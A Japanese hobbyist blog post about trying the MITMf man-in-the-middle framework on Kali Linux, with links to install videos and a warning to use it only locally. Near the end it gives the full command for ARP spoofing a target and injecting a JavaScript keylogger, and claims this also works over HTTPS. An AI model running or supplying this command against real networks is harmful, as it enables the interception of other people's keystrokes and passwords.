何をしているかまる分かり!?ハッカー気分を味わってみよう 【Mimtf編】

2019年9月17日

本日は暇だったので先日ダウンロードしておいたKali Linuxで遊んでました。

結果は結構楽しめましたね。ハッカー気分が味わえて面白かったですw

まずMitmfとは何か?というのを説明しときますね。

 

※必ずローカル環境で実行してください。他者に対してMitmf攻撃を行うと普通に警察に捕まりますので絶対やめてください。当たり前ですがそれに伴ったいかなる責任も私は負いませんよ!

 

 

Mitmfとは?

中間者攻撃(Man In The Middle Attack Framework)とも言います。簡単に言えば攻撃側のPCと被害者のPCの中間に入り情報を勝手に見たり改ざんしたりします。

Mitmfをインストールする前にKali LinuxというVirtualBoxやVMwareで仮想環境を作らないといけないのですが他のサイトにのっているのでそちらを参考にしてください。

Kali Linux のインストール方法

http://qiita.com/fs-rd-takuya-takeda/items/33dedf3d007b9b3bde28

 

Kali Linuxの環境が整ったら早速MitmfをKali Linuxにダウンロードしていきます。

<英語バージョン>

https://www.youtube.com/watch?v=k3h_KL6qsWc

<韓国語バージョン>

https://youtu.be/XyHD94w7HMY?list=PL_vM1Q_UrWI8cEcgyBKtNmNXXl6lYTkAo

 

2つの動画のやり方は少し違いますがどの方法でやっても出来るようになります。韓国語や英語で何言ってるかわからないと思いますが大体画面通りにやったら出来ますw

 

 

Mitmf攻撃に成功すると?

 

被害者側がPCに打つすべての文字が攻撃側のPCに転送出来るようになります。もしgoogleにkawaiikoと検索すると攻撃側のPCに以下のように表示されます

 

keys: kawaiikoっていうのが見えると思います

 

 

このようにkeyとして打った文字が返ってきます。打ってる文字は気にしないでください。親切にもOSやブラウザ名も返してくれますw

 

 

 

詰まったポイント

 

詰まったポイントはGatewayの部分ですね。

cdでMITMfに移動して

 

./mitmf.py –spoof –arp -i eth0 –gateway (被害PCのゲートウェイ) –target (被害PCのIPアドレス) –jskeylogger-

のコマンドを打つとmitmfでの攻撃開始となるんですがゲートウェイの部分に攻撃PCのゲートウェイを入れてました。これはまさに無知による弊害ですね。こりゃゲートウェイの勉強のやり甲斐がありそうです。

あと追加情報ですが動画ではhttpでの環境でしか実装しませんでしたが
なんとhttpsでも普通に実行できます。確認済みなのでぜひ挑戦してみてくださいね!(もちろん自身のローカル環境でですよ!)